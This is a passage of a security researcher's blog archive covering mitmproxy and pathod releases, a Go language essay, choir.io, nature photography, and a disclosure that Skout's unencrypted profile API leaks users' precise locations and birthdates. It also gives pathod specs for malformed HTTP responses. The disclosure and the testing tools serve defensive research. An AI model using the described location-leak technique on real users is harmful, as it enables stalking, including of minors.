network account, to the ability to completely take over the user's Facebook and Twitter accounts using just a UDID.</li> </ul> As serious these problems are, I'm afraid it's just the tip of the iceberg. Negotiating disclosure and trying to convince companies to fix their problems has taken literally months of my time, so I've stopped publishing on this issue for the moment. It's disheartening to say it, but some of the companies mentioned in my posts still</em> have unfixed problems (they were all notified well in advance of any publication). I will also note ominously that I know of a number of similar vulnerabilities elsewhere in the IOS app ecosystem that I've just not had the time to pursue.</p> When speaking to people about this, I've often been asked "What's the worst that can happen?". My response was always that the worst case scenario would be if a large database of UDIDs leaked... and here we are.</p> Defiler 2012-08-26T00:00:00+00:00 I've been living out of a bag for the last 3 weeks, working hard on a series of intense but fun audits. After running in high gear for a while I find that I need a mental palate cleanser - something to help me refocus and stop me from getting snowblind. I then grab my camera, strap on my macro rig, and walk out the door to try to catch the local wildlife in the act. It's become a bit of a game - the aim is to catch creatures in their natural setting and leave them completely undisturbed when I go, with no posing, prodding or other disturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in the wind is a fun challenge.</p> Today I find myself in Sydney, working in a part of the town that is shot through with unreasonably beautiful walking tracks. The place is also blessed with a huge diversity of invertebrate life that makes my adopted home town</a> seem barren by comparison. I walked along a nearby track until I found a quiet, leafy spot, geared up, and leopard-crawled through the underbrush. Not long after, I came face-to-face with this imposing little chap sitting on the tip of a fern frond.</p> </a> </div> This is a Lymantriid</a> caterpillar of some variety, probably one of the tussock moths native to Australia. "Lymantria" means "defiler" - some species of this family can cause huge damage to foliage, and are considered to be destructive pests. So much so, that when a single male Gypsy Moth</a> (Lymantria dispar) was discovered in Hamilton, New Zealand, they sprayed the entire city with a caterpillar-specific bacterial insecticide</a>.</p> No need for drastic measures with this particular fellow, though - he's native to this ecosystem, and the only pest is me and my camera. He was head down munching away when I found him, and paid absolutely no attention to me when I moved in close to get these shots. He's got reason to be cocksure, too - those tufts of hair on his back contain hollow, poison-filled spines that can cause a pretty unpleasant reaction when touched.</p> </a> </div> An few hours exploring and photographing is a very effective brain-cleaner, leaving me ready to deal with spiny, venomous defilers of the digital variety.</p> pathod 0.2: the daemon gets an evil twin 2012-08-22T00:00:00+00:00 I've just pushed pathod 0.2 out the door. This is a huge release, with many new features:</p> pathoc</a>, pathod's evil client-side twin.</li> libpathod.test</a>, a framework for using pathod in your unit tests.</li> Improved mini language</a>, including many new abilities and improvements.</li> A rewrite of the networking core.</li> </ul> The project also has a new website at pathod.net</a>. Yes, pathod is now self-hosting, so you can try out both pathod and pathoc specifications right on the website. There's also a new public pathod instance</a>, which I'm sure everyone will use entirely responsibly.</p> Introducing pathod: a pathological HTTP server 2012-05-01T00:00:00+00:00 I've just released pathod</a>, a pathological HTTP/S daemon useful for testing and torturing HTTP clients. At its core is a tiny, terse language for crafting HTTP responses. It also has a built-in web interface that lets you play with the response spec language, inspect logs, and access pathod's full help document.</p> The rest of this post is a quick teaser showing some of pathod's abilities. See the detailed documentation on the pathod site</a> if you want more.</p> The simplest possible response</h2> The easiest way to craft a response is to specify it directly in the request URL. Lets start with the simplest possible example. Start pathod, and then visit this URL:</p> http://localhost:9999/p/200 </span></code></pre> The "/p/" path is the location of the response generator in pathod's default configuration - everything after that a response specification in pathod's mini-language. The general form of a response spec is as follows:</p> code[MESSAGE]:[colon-separated list of features] </span></code></pre> In this case, we're specifying only the HTTP response code - that is, an HTTP 200 OK with no headers and no content, resulting in a response like this:</p> HTTP/1.1 200 OK </span></code></pre>Specifying features</h2> One example of a "feature" is a response header. Lets embellish our response by adding one:</p> 200:h"Etag"="foo" </span></code></pre> The first letter of the feature - "h", in this case - is a mnemonic indicating the type of feature we're adding. The full response to this spec looks like this:</p> HTTP/1.1 200 OK Etag: foo </span></code></pre> Both "Etag" and "foo" are Value Specifiers, a syntax used throughout the response specification language. In this case they are literal values, as indicated by the fact that they are quoted strings. The Value Specification syntax also lets us load values from files or generate random data. For instance, here is a specification that generates 100k of random binary data for the header value:</p> 200:h"Etag"=@100k </span></code></pre> Now, binary data in the header value will probably break things in interesting ways, but is unlikely to be read by the client as a valid (but over-long) value. To see if the client really drops off its perch if we feed it a single 100k header, we have to constrain the random data. Here's the same response, but with data generated only from ASCII letters:</p> 200:h"Etag"=@100k,ascii_letters </span></code></pre> pathod has a large number of built-in character classes from which random data can be generated.</p> Pauses and Disconnects</h2> Next, we can disrupt the communications in various ways. At the moment, this means adding pauses and disconnects to a response. Let's start with an HTTP 404 response with a body consisting of a 100k of random binary data:</p> 404:b@100k </span></code></pre> Here's the same response, but with a 120 second pause after sending 100 bytes:</p> 404:b@100k:p120,100 </span></code></pre> And, the same response again, but with hard disconnect after sending 100 bytes:</p> 404:b@100k:d100 </span></code></pre> Instead of specifying a time explicitly, we can ask pathod to just randomly disconnect at a time of its choosing:</p> 404:b@100k:dr </span></code></pre> That's it for the teaser - hopefully it's enough to entice you into looking at pathod</a>'s full documentation.</p> What's next?</h2> pathod is an "airport project" - the first draft was written in its entirety during a 40-hour trip back home from New York (I drew a bad lot in stopovers). I've now firmed it up a bit, but there's still work to be done. In the next month, mitmproxy's test suite will move to pathod, after which there will be a simple, well-documented way to unit test. I also plan to build out the JSON API (which is used to drive pathod in test suites), and expand the mini-language with convenient ways to generate pathological cookies, authentication headers, SSL errors, and cache control.</p> mitmproxy 0.8 2012-04-09T00:00:00+00:00 </a> </div> I'm happy to announce the release of mitmproxy 0.8</a>. This release has a few major new features, big speedups, and many, many small bugfixes and improvements. Here are the headlines:</p> Android interception</h2> The most prominent new feature is that we now have a supported way to intercept Android traffic. What's more, we can do this without a cumbersome transparent proxying rig - see the Android section in the documentation</a> for the details. Special thanks goes to Jim Cheetham</a> for lending me an Android device and helping to get this feature off the ground.</p> Replacement patterns</h2> Another exceedingly useful new feature is replacement patterns</a>. These consist of a filter, a regular expression and a replacement string, and run continuously while mitmproxy processes requests and responses. You can pass these either on the command-line, or using a built-in replacement pattern editor.</p> </a> </div> I'm sure you can immediately think of many uses for this flexible feature, but my favourite is to use it during testing as a way to conveniently inject complicated exploits into web traffic. I do this by setting a replacement pattern that swaps a short but likely unique string (say MYXSS) for a long exploit, and then I use simple interaction and front-end tools like Firebug to inject exploits into requests manually based on the short string marker.</p> Improved pretty-printing of request and response contents</h2> This release of mitmproxy has a completely redesigned subsystem for pretty-printing request and response bodies. For instance, we now extract EXIF tags and other basic information to give you something better than a hex dump when looking at an image:</p> </a> </div> We also have much improved HTML indenting (using lxml</a>), and a built-in JavaScript beautifier (thanks to JSBeautifier</a>) that teases out compressed and obfuscated scripts into something readable.</p> Changelog</h2> Detailed tutorial for Android interception. Some features that land in this release have finally made reliable Android interception possible.</li> Upstream-cert mode, which uses information from the upstream server to generate interception certificates.</li> Replacement patterns that let you easily do global replacements in flows matching filter patterns. Can be specified on the command-line, or edited interactively.</li> Much more sophisticated and usable pretty printing of request bodies. Support for auto-indentation of JavaScript, inspection of image EXIF data, and more.</li> Details view for flows, showing connection and SSL cert information (X keyboard shortcut).</li> Server certificates are now stored and serialized in saved traffic for later analysis. This means that the 0.8 serialization format is NOT compatible with 0.7.</li> Add a shortcut key ("f") to load the remainder of a request or response body, if it is abbreviated.</li> Many other improvements, including bugfixes, and expanded scripting API, and more sophisticated certificate handling.</li> </ul> mitmproxy 0.7 2012-02-27T00:00:00+00:00 </a> </div> I'm happy to announce the release of mitmproxy 0.7</a>. The biggest visible change is a new structured editor for headers, query strings and form fields. Other new feature include a reverse proxy mode, extended script API that makes many common tasks much easier, and a myriad of improvements to the interface (including a massive increase in speed). Everybody still on 0.6 should upgrade - get it here:</p> mitmproxy-0.7.tar.gz</a> (docs)</a></h2> You can also now install mitmproxy using pip</a>, like so:</p> </span>pip</span> install mitmproxy </span></code></pre> In other news, the project has had an amazing month, after a rash of high-profile results obtained using mitmproxy were published. It started with Arun Thampi's discovery</a> that Path uploads users' address books to their servers. Things snowballed from there, and for a few days mitmproxy seemed to be everywhere. Similar findings were made for Hipster</a>, The Verge</a> did a mitmproxy-driven AddressbookGate expose (including vaguely threatening background shots of mitmproxy doing its dastardly work), and lots of people said nice things on Twitter.</p> To see the impact all of this for the mitmproxy project, you need only look at the Github page</a> - watchers of the repo went from about 200 a month a go, to 950 at the time of this post.</p> Changelog</h2> New built-in key/value editor. This lets you interactively edit URL query strings, headers and URL-encoded form data.</li> Extend script API to allow duplication and replay of flows.</li> API for easy manipulation of URL-encoded forms and query strings.</li> Add "D" shortcut in mitmproxy to duplicate a flow.</li> Reverse proxy mode. In this mode mitmproxy acts as an HTTP server, forwarding all traffic to a specified upstream server.</li> UI improvements - use Unicode characters to make GUI more compact, improve spacing and layout throughout.</li> Add support for filtering by HTTP method.</li> Add the ability to specify an HTTP body size limit.</li> Move to typed netstrings for serialization format - this makes 0.7 backwards-incompatible with serialized data from 0.6!</li> Significant improvements in speed and responsiveness of UI.</li> Many minor bugfixes and improvements.</li> </ul> OpenBSD in decline? 2012-02-26T00:00:00+00:00 My leisurely Sunday activity today is to set up a new OpenBSD</a> firewall for my mobile app testing lab. I haven't done a from-scratch OpenBSD install for years, so I spent some time reading through the change logs for the last few versions to catch up with what's changed. Although the project is clearly still making steady, well-engineered progress, I had the nagging feeling that the rate of change wasn't what it used to be. So, I pulled some numbers from CVS commit message list archives</a>, and graphed them. Here are the number of commits per month from January 2001 to January 2012. The orange line is a simple 12-month moving average:</p> </a> </div> Now, we should be cautious about interpreting this - the number of commits doesn't tell us anything about the quality, importance or magnitude of code change. Even if it did all of these things, there are other and perhaps better measures of a project's health. Still, the trend is clear, and suggests a sustained decline in activity.</p> I just bought some T-shirts</a> to help support one of my favourite open source projects. You should too.</p> Malware 2012-01-05T00:00:00+00:00 Edit: Since this post, I've created an interactive tool for binary visualisation - see it at binvis.io</a></b></p> Hover and click for more.</p>}

How I Learned to Stop Worrying and Love Golang

2013-11-21T00:00:00+00:00

Here's a riff on Malcolm Gladwell's rule of thumb about mastery</a>: you don't really know a programming language until you've written 10,000 lines of production-quality code in it. Like the original this is a generalization that is undoubtedly false in many cases - still, it broadly matches my intuition for most languages and most programmers 1</a></sup>. At the beginning of this year, I wrote a sniffy post about Go</a> when I was about 20% of the way to knowing the language by this measure. Today's post is an update from further along the curve - about 80% - following a recent set of adventures that included entirely rewriting choir.io</a>'s core dispatcher in Go. My opinion of Go has changed significantly in the meantime. Despite my initial exasperation, I found that the experience of actually writing Go was not unpleasant. The shallow issues became less annoying over time (perhaps just due to habituation), and the deep issues turned out to be less problematic in practice than in theory. Most of all, though, I found Go was just a fun and productive language to work in. Go has colonized more and more use cases for me, to the point where it is now seriously eroding my use of both Python and C.</p>

After my rather slow Road to Damascus experience, I noticed something odd: I found it difficult to explain why Go worked so well in practice. Sure, Go has a triad of really smashing ideas (interfaces, channels and goroutines), but my list of warts and annoyances is long enough that it's not clear on paper that the upsides outweigh the downsides. So, my experience of actually cutting code in Go was at odds with my rational analysis of the language, which bugged me. I've thought about this a lot over the last few months, and eventually came up with an explanation that sounds like nonsense at first sight: Go's weaknesses are also its strengths. In particular, many design choices that seem to reduce coherence and maintainability at first sight actually combine to give the language a practical character that's very usable and compelling. Lets see if I can convince you that this isn't as crazy as it sounds.</p>

Maps and magic</h2>

Lets pretend that we're the designers of Go, and see if we can follow the thinking that went into a seemingly simple part of the language - the value retrieval syntax for maps. We begin with the simplest possible case - direct, obvious, and familiar from a number of other languages:</p>

v </span>:= </span>mymap</span>["</span>foo</span>"]
</span></code></pre>
It would be nice if we could keep it this simple, but there's a complication -
what if "foo" doesn't exist in the map? The fact that Go doesn't have
exceptions limits the possibilities. We can discard some gross options out of
hand - for instance, making this a runtime error or returning a magic value
flagging non-existence are both pretty horrible. A more plausible route is to
pass an existence flag back as a second return value:</p>
v</span>, </span>ok </span>:= </span>mymap</span>["</span>foo</span>"]
</span></code></pre>
So far, so logical, and if consistency was the primary goal, we would stop here.
However, having two return arguments would make many common patterns of use
inconvenient. You would constantly be discarding the ok</strong> flag in situations
where it wasn't needed. Another repercussion is that you couldn't directly use
the results in an if</strong> clause. Instead of a clean phrasing like this (relying
on the zero value returned by default):</p>
if map</span>["</span>foo</span>"] {
    </span>// Do something
</span>}
</span></code></pre>
... you would have to do this:</p>
if </span>_</span>, </span>ok </span>:= </span>map</span>["</span>foo</span>"]; </span>ok </span>{
    </span>// Do something
</span>}
</span></code></pre>
Ugh. What we really want, is to get the best of both worlds. The ease of the
first signature, plus the flexibility of the second. In fact, Go does exactly
that, in a surprising way: it discards some basic conceptual constraints, and
makes the data returned by the map accessor depend on how many variables it's
assigned to. When it's assigned to one variable, it just returns the value.
When it's assigned to two variables, it also returns an existence flag.</p>
Compare this with Python. The dictionary access syntax is identical:</p>
v = mymap["</span>foo</span>"]
</span></code></pre>
Python does have exceptions, so non-existence is signaled through a
KeyError</strong>, and the dictionary interface includes a get</strong> method that
allows the user to specify a default return when this is too cumbersome. This
is certainly consistent on the surface, but there's also a deeper structure
that helps the user understand what's going on. The square bracket accessor
syntax is just syntactic sugar, because the call above is equivalent to this:</p>
v = mymap.</span>__getitem__</span>("</span>foo</span>")
</span></code></pre>
In a sense, then, the value access is just a method call. The coder can write a
dictionary of their own that acts just like a built-in dictionary2</a></sup>, and can
also build a clear mental model of what's going on underneath. Python
dictionaries are conceptually built up</em> from more primitive language elements,
where Go maps are designed down</em> from concrete use cases.</p>
Range: a compendium of use cases</h2>
An even stranger beast is the range</strong> clause of Go's for loops. Like map
accessors, range</strong> will return either one value or two, depending on the
number of variables assigned to. What's particularly revealing about range</strong>
is the way these results differ depending on the data type being ranged over.
Consider this piece of code, for example:</p>
for </span>x</span>, </span>y </span>:= </span>range </span>v </span>{
}
</span></code></pre>
To figure out what this does, we need to know the type of v</strong>, and then
consult a table like this:3</a></sup></p>

    
        Range expression</th>
        1st Value</th>
        2nd Value</th>
    </tr>
    

        array or slice</td>
        index i</td>
        a[i]</td>
    </tr>
    

        map</td>
        key k</td>
        m[k]</td>
    </tr>
    

        string</td>
        index i of rune</td>
        rune int</td>
    </tr>
    

        channel</td>
        element</td>
        error</td>
    </tr>
</table>
What range does for arrays and maps seems consistent and not particularly
surprising. Things get a tad slightly odd with channels. A second variable
arguably doesn't make much sense when ranging over a channel, so trying to do
this results in a compile time error. Not terribly consistent, but logical.</p>
Weirder still is range</strong> over strings. When operating on a string, range
returns runes</a> (Unicode code points) not
bytes.  So, this code:</p>
s </span>:= "</span>a</span>\u00fc</span>b</span>"
</span>for </span>a</span>, </span>b </span>:= </span>range </span>s </span>{
    </span>fmt</span>.</span>Println</span>(</span>a</span>, </span>b</span>)
}
</span></code></pre>
Prints this:</p>
0 97
1 252
3 98
</span></code></pre>
Notice the jump from 1 to 3 in the array index, because the rune at offset 1 is
two bites wide in UTF-8. And look what happens when we now retrieve the value
at that offset from the array. This:</p>
fmt</span>.</span>Println</span>(</span>s</span>[</span>1</span>])
</span></code></pre>
Prints this:</p>
195
</span></code></pre>
What gives? At first glance, it's reasonable to expect this to print 252, as
returned by range</strong>. That's wrong, though, because string access by index
operates on bytes, so what we're given is the first byte of the UTF-8 encoding
of the rune. This is bound to cause subtle bugs. Code that works perfectly on
ASCII text simply due to the fact that UTF-8 encodes these in a single byte
will fail mysteriously as soon as non-ASCII characters appear.</p>
My argument here is that range</strong> is a very clear example of design directly
from concrete use cases down, with little concern for consistency. In fact, the
table of range</strong> return values above is really just a compendium of use
cases: at each point the result is simply the one that is most directly useful.
So, it makes total sense that ranging over strings returns runes. In fact,
doing anything else would arguably be incorrect. What's characteristic here is
that no attempt was made to reconcile this interface with the core of the
language. It serves the use case well, but feels jarring.</p>
Arrays are values, maps are references</h2>
One final example along these lines. A core irregularity at the heart of Go is
that arrays are values, while maps are references. So, this code will
modify the s</strong> variable:</p>
func </span>mod</span>(</span>x </span>map</span>[</span>int</span>] </span>int</span>){
    </span>x</span>[</span>0</span>] = </span>2
</span>}

</span>func </span>main</span>() {
    </span>s </span>:= </span>map</span>[</span>int</span>]</span>int</span>{}
    </span>mod</span>(</span>s</span>)
    </span>fmt</span>.</span>Println</span>(</span>s</span>)
}
</span></code></pre>
And print:</p>
map[0:2]
</span></code></pre>
While this code won't:</p>
func </span>mod</span>(</span>x </span>[</span>1</span>]</span>int</span>){
    </span>x</span>[</span>0</span>] = </span>2
</span>}

</span>func </span>main</span>() {
    </span>s </span>:= [</span>1</span>]</span>int</span>{}
    </span>mod</span>(</span>s</span>)
    </span>fmt</span>.</span>Println</span>(</span>s</span>)
}
</span></code></pre>
And will print:</p>
[0]
</span></code></pre>
This is undoubtedly inconsistent, but it turns out not to be an issue in
practice, mostly because slices are</em> references, and are passed around much
more frequently than arrays. This issue has surprised enough people to make it
into the Go FAQ, where the justification is as
follows</a>:</p>

There's a lot of history on that topic. Early on, maps and channels were
syntactically pointers and it was impossible to declare or use a non-pointer
instance. Also, we struggled with how arrays should work. Eventually we
decided that the strict separation of pointers and values made the language
harder to use. This change added some regrettable complexity to the language
but had a large effect on usability: Go became a more productive, comfortable
language when it was introduced.</p>
</blockquote>
This is not exactly the clearest explanation for a technical decision I've ever
read, so allow me to paraphrase: "Things evolved this way for pragmatic
reasons, and consistency was never important enough to force a reconciliation".</p>
The G Word</h2>
Now we get to that perpetual bugbear of Go critiques: the lack of generics.
This, I think, is the deepest example of the Go designers' willingness to
sacrifice coherence for pragmatism. One gets the feeling that the Go devs are a
tad weary of this argument by now, but the issue is substantive and worth
facing squarely. The crux of the matter is this: Go's built-in container types
are super special. They can be parameterized with the type of their contained
values in a way that user-written data structures can't be.</p>
The supported way to do generic data structures is to use blank interfaces.
Lets look at an example of how this works in practice. First, here is a simple
use of the built-in array type.</p>
l </span>:= </span>make</span>([]</span>string</span>, </span>1</span>)
</span>l</span>[</span>0</span>] = "</span>foo</span>"
</span>str </span>:= </span>l</span>[</span>0</span>]
</span></code></pre>
In the first line we initialize the array with the type string</strong>. We then
insert a value, and in the final line, we retrieve it. At this point, str</strong>
has type string</strong> and is ready to use. The user-written analogue of this
might be a modest data structure with put</strong> and get</strong> methods. We can
define this using interfaces like so:</p>
type </span>gtype </span>struct </span>{
    </span>data </span>interface</span>{}
}
</span>func </span>(</span>t </span>*</span>gtype</span>) </span>put</span>(</span>v </span>interface</span>{}) {
    </span>t</span>.</span>data </span>= </span>v
</span>}
</span>func </span>(</span>t </span>*</span>gtype</span>) </span>get</span>() </span>interface</span>{} {
    </span>return </span>t</span>.</span>data
</span>}
</span></code></pre>
To use this structure, we would say:</p>
v </span>:= </span>gtype</span>{}
</span>v</span>.</span>put</span>("</span>foo</span>")
</span>str </span>:= </span>v</span>.</span>get</span>().(</span>string</span>)
</span></code></pre>
We can assign a string to a variable with the empty interface type without
doing anything special, so put</strong> is simple. However, we need to use a type
assertion on the way out, otherwise the str</strong> variable will have type
interface{}</strong>, which is probably not what we want.</p>
There are a number of issues here. It's cosmetically bothersome that we have to
place the burden of type assertion on the caller of our data structure, making
the interface just a little bit less nice to use. But the problems extend
beyond syntactic inconvenience - there's a substantive difference between these
two ways of doing things.  Trying to insert a value of the wrong type into the
built-in array causes a compile-time error, but the type assertion acts at
run-time and causes a panic on failure. The blank-interface paradigm sidesteps
Go's compile time type checking, negating any benefit we may have received from
it.</p>
The biggest issue for me, though, is the conceptual inconsistency. This is
something that's difficult to put into words, so here's a picture:</p>

    
        
    </a>
</div>
The fact that the built-in containers magically do useful things that
user-written code can't irks me. It hasn't become less jarring over time, and
still feels like a bit of grit in my eye that I can't get rid of. I might be an
extreme case, but this is an aesthetic instinct that I think is shared by many
programmers, and would have convinced many language designers to approach the
problem differently.</p>
The extent to which Go's lack of generics is a critical problem, however, is
not the point here. The meat of the matter is why</strong> this design decision was
taken, and what it reveals about the character of Go. Here's how the lack of
generics is justified by the Go
developers</a>:</p>

Many proposals for generics-like features have been mooted both publicly and
internally, but as yet we haven't found a proposal that is consistent with
the rest of the language. We think that one of Go's key strengths is its
simplicity, so we are wary of introducing new features that might make the
language more difficult to understand.</p>
</blockquote>
Instead of creating the atomic elements needed to support generic data
structures then adding a suite of them to the standard library, the Go team
went the other way. There was a concrete use case for good data structures, and
so they were added. Attempting a deep reconciliation with the rest of the
language was a secondary requirement that was so unimportant that it fell by
the wayside for Go 1.x.</p>
A Pragmatic Beauty</h1>
Lets over-simplify for a moment and divide languages into two extreme camps. On
the one hand, you have languages that are highly consistent, with most higher
order functionality deriving from the atomic elements of the language. In this
camp, we can find languages like Lisp. On the other hand are languages that are
shamelessly eager to please. They tend to grow organically, sprouting syntax as
needed to solve specific pragmatic problems. As a consequence, they tend to be
large, syntactically diverse, not terribly coherent, and, occasionally,
sometimes even unparseable</a>. In this
camp, we find languages like Perl. It's tempting to think that there exists a
language somewhere in the infinite multiverse of possibilities that unites
perfect consistency and perfect usability, but if there is, we haven't found
it. The reality is that all languages are a compromise, and that balancing
these two forces against each other is really what makes language design so
hard. Placing too much value on consistency constrains the human concessions we
can make for mundane use cases.  Making too many concessions results in a
language that lacks coherence.</p>
Like many programmers, I instinctively prefer purity and consistency and
distrust "magic". In fact, I've never found a language with a strongly
pragmatic bent that I really liked. Until now, that is. Because there's one
thing I'm pretty clear on: Go is on the Perl end of this language design
spectrum. It's designed firmly from concrete use cases down, and shows its
willingness to sacrifice consistency for practicality again and again. The
effects of this design philosophy permeate the language. This, then, is the
source of my initial dissatisfaction with Go: I'm pre-disposed to dislike many
of its core design decisions.</p>
Why, then, has the language grown on me over time? Well, I've gradually become
convinced that practically-motivated flaws like the ones I list in this post
add up to create Go's unexpected nimbleness. There's a weird sort of alchemy
going on here, because I think any one of these decisions in isolation makes Go
a worse language (even if only slightly). Together, however, they jolt Go out
of a local maximum many procedural languages are stuck in, and take it
somewhere better. Look again at each of the cases above, and imagine what the
cumulative effect on Go would have been if the consistent choice had been made
each time. The language would have more syntax, more core concepts to deal
with, and be more verbose to write. Once you reason through the repercussions,
you find that the result would have been a worse language overall. It's clear
that Go is not the way it is because its designers didn't know better, or
didn't care. Go is the result of a conscious pragmatism that is deep and
audacious. Starting with this philosophy, but still managing to keep the
language small and taut, with almost nothing dispensable or extraneous took
great discipline and insight, and is a remarkable achievement.</p>
So, despite its flaws, Go remains graceful. It just took me a while to
appreciate it, because I expected the grace of a ballet dancer, but found the
grace of an battered but experienced bar-room brawler.</p>
--</p>
Edited to remove some inaccuracies about channels.</p>
^3</sup>Simplified from here</a>.</p>
</div>
^{2</sup>
I don't mean mundane details like the syntax and core concepts of a
language. In the case of Go, you can get a handle on these in an hour by
reading the language specification.</p>
</div>}^{1</sup>
Pedant hedge: yes, the illusion isn't perfect, and there are in fact
subtle ways in which Python dictionaries are not just objects like any other.</p>
</div>}
mitmproxy and pathod 0.9.2
2013-08-25T00:00:00+00:00

    
        
    </a>
</div>
I've just released v0.9.2 of both mitmproxy</a> and
pathod</a>. This is a bugfix release, chiefly to address two
crashing issues affecting mitmproxy when relaying SSL traffic. A range of other
fixes and improvements are also included - if you use mitmproxy, you should
upgrade.</p>
CHANGELOG</h2>

Improvements to the mitmproxywrapper.py helper script for OSX.</li>
Don't take minor version into account when checking for serialized file
compatibility.</li>
Fix a bug causing resource exhaustion under some circumstances for SSL
connections.</li>
Revamp the way we store interception certificates. We used to store these
on disk, they're now in-memory. This fixes a race condition related to
cert handling, and improves compatibility with Windows, where the rules
governing permitted file names are weird, resulting in errors for some
valid IDNA-encoded names.</li>
Display transfer rates for responses in the flow list.</li>
Many other small bugfixes and improvements.</li>
</ul>


Introducing choir.io
2013-08-16T00:00:00+00:00

    
        
    </a>
    
        choir.io
    </div>
</div>
Today, I'm raising the veil (slightly) on a new project -
choir.io</a>. The most succinct description of choir.io is that
it is a service that turns events into sound. Why would you want to do that?
Well, I believe that there are compelling reasons to make sound part of your
monitoring stack. Let's see if I can convince you.</p>
The soundscape</h2>
When I walk into my study every morning, I'm surrounded a rich, subtle
soundscape that exists just beneath conscious perception. My air-conditioner,
computers and monitors all emit hums and purrs. I can "tune in" to these if I
focus, but they usually only draw my attention when something changes. When the
power goes out there is a deathly silence, when a CPU fan noise changes pitch
or texture, it bothers me immediately.</p>
Layered over this background are more obtrusive sounds, closer to the threshold
of awareness - the clacking of keyboards, faint noises of my family getting
ready for their day upstairs, the front door opening and closing. Whether or
not I pay attention to these is somewhat context dependent. Am I waiting, or
instance, for my wife and kids to start trooping down the stairs so I can join
them for my son's swimming lesson? If I am, I listen out for those sounds
specifically. I get an enormous amount of information about my world from these
more discrete, event-related noises.</p>
Finally, there are the really obtrusive sounds, things that immediately get my
attention. This might be someone saying my name, my phone ringing, a knock at
the door, or a smoke alarm. I'm very aware of these, and they usually signal
something I have to deal with immediately.</p>
These layers of more and less obtrusive sounds form a soundscape that is
ever-present, and utterly necessary in our day-to-day lives. Notice how
effortless this process of extracting meaning from our ambient sounds is. Our
minds process this information stream without any mental exertion, filters out
what we don't need to notice, and draws our attention to what we do. There's a
lot of cognitive research (that I might delve into in future posts) that show
that our brains and auditory systems are specifically designed to make sense of
the world in this way.</p>
We have nothing like this rich texture of ambient awareness for the technology
that surrounds us. Our monitoring mechanisms seem to be stuck at the ends of
the intrusiveness spectrum. At one end, we have email notifications that demand
our attention until we start to ignore them or silence them with a filter.  At
the other end we have passive status dashboards that require us to remember to
switch context and visually consult a different interface. Choir.io doesn't aim
to supplant either of these, but tries to fill in the blank portion of the
awareness spectrum between them.</p>
When I sit at my desk, I can hear our server architecture humming away. There's
the subtle pitter-patter of hits to various webservers, the occasional clack of
an SSH login. Occasionally there is a chime when @alexdong pushes to Github,
followed shortly by the celebratory cheer of a server deploy. When I hear the
jarring note of a 500 server error, I switch context to view logs or a
dashboard, but otherwise my focus stays with my editor window. Choir is young,
but it's already become an indispensable part of my life.</p>
Challenges and next steps</h2>
There are a number of key questions that we'd like to answer with the help of
our intrepid early adopters. First among these is the question of soundscape
design. What makes a good sound pack? What is the right mix of intrusive and
non-intrusive sounds? How do we construct soundscapes that blend into the
background like natural sounds do? Another set of questions surrounds the API
and integration. What is the right blend of simplicity and power is in the API?
Which services should we integrate with next?</p>
There are some obvious next steps in the works. We recognize that sound pack
design is a deep problem with subjective solutions. So, letting users assemble,
edit and eventually share their own sound packs is high on our list of
priorities. Free-standing Choir.io player apps for Windows and OSX will also be
on the way soon, so you won't need to remember to keep a browser tab open.
Technical improvements to the API that are on the way include UDP and SSL
support.</p>
Choir is trying to do something new, and we want as much feedback as early in
the process as possible. So, we've decided to start sending out invites today,
even though Choir is far from the polished system that it will be in a few
months. If you're brave, willing to give frank feedback, and want to help us
explore this exciting idea, please request an invite</a>.</p>


mitmproxy 0.9.1
2013-06-16T00:00:00+00:00

    
        
    </a>
</div>
I'm happy to announce the release of mitmproxy 0.9.1</a>.
This is a bugfix release, with no significant changes in behaviour.</p>
As hinted in my previous release note, the project itself is also evolving. As
of this release, mitmproxy and its sister projects (pathod</a>
and netlib</a>) are housed under a separate
organization on Github, rather than my own personal space:</p>
github.com/mitmproxy</a></p>
I'm also very happy to welcome the first external core developer to the
mitmproxy projext: Maximilian Hils</a>. Max is the
author of HoneyProxy</a>, a web analysis front-end for
mitmproxy. In the next few months, he'll be working on integrating and
expanding his work to become mitmproxy's official web interface. Max's efforts
will be sponsored by Google under their Summer of
Code</a> program, and
will be mentored by the HoneyNet Project</a>.</p>
Changelog</h2>

Use "correct" case for Content-Type headers added by mitmproxy.</li>
Make UTF environment detection more robust.</li>
Improved MIME-type detection for viewers.</li>
Always read files in binary mode (Windows compatibility fix).</li>
Correct PyOpenSSL dependency declaration.</li>
Some developer documentation.</li>
</ul>


Skout: a devastating privacy vulnerability
2013-05-31T00:00:00+00:00
I've become a bit weary of the process of public vulnerability disclosure - I'm
much more likely nowadays to just drop companies an anonymous notice and move
on. Every so often, though, I come across an issue so egregious that talking
about it publicly seems like an imperative. This is one of them.</p>
First, some background. Skout is a location-based mobile social network. The
idea is to allow people to meet others in their area, semi-anonymously, get to
know them, and then perhaps line up a meeting in meatspace. As far as I can
tell, a huge fraction of the userbase are singles, using Skout as an ad-hoc
dating app. Skout's scale is significant - they don't release exact user
numbers, but I've seen claims of more than 10 million users, and a growth rate
of a million users per month.</p>
In 2012, Skout went through a major PR catastrophe, when its service was linked
to no fewer than 3 separate rapes of
children</a>
by adult men posing as teenagers. Skout immediately suspended the service for
teenagers and went through a security re-vamp. A month later, teens were
allowed back</a>,
with Skout making much of its new safety system, "advanced, proprietary
algorithms" to weed out stalkers, and its long-term commitment to community
safety.</p>
Given this background, the problem I found is simple but devastating. The Skout
mobile application talks to Skout's servers through a simple API. When a user's
profile is viewed an unencrypted, plain-HTTP request is made to to a path like
this:</p>
http://i22.skout.com/services/ServerService/getProfile
</code></pre>
What's returned is a blob of XML containing the user's complete profile data.
In fact, the profile data is too</em> complete, including some bits of data
information that is never actually used by the app. For example, we can see the
user's exact date of birth:</p>
<</span>ax213:birthdayDate</span>>xx/xx/1995</</span>ax213:birthdayDate</span>>
</span></code></pre>
... but only the user's age in years is actually displayed. Most serious,
however, is the high-precision location information that is returned in the
ax213:homeLocation and ax213:location tags:</p>
<</span>ax213:latitude</span>>-xx.xxx</</span>ax213:latitude</span>>
<</span>ax213:longitude</span>>xxx.xxx</</span>ax213:longitude</span>>
</span></code></pre>
The three decimal places of precision in the co-ordinates is enough to locate a
user to within about 110 meters north-south, and substantially less than that
east-west depending on the distance from the equator. Here's what that looks
like in a hypothetical example:</p>

    
        
    </a>
</div>
I used mitmproxy</a> to observe Skout's traffic, but
because the request is unencrypted any tool that allows you to inspect network
traffic would be enough. The result is a stalker's wet dream - click on an
anonymous profile, watch your network traffic, and find out exactly where the
victim lives. I've also seen minors located at malls where they hang out, and
at their schools... Given the scale of Skout's userbase and the ease with which
the data can be obtained, I think there's a high likelihood that this issue has
already been used for unsavoury purposes.</p>
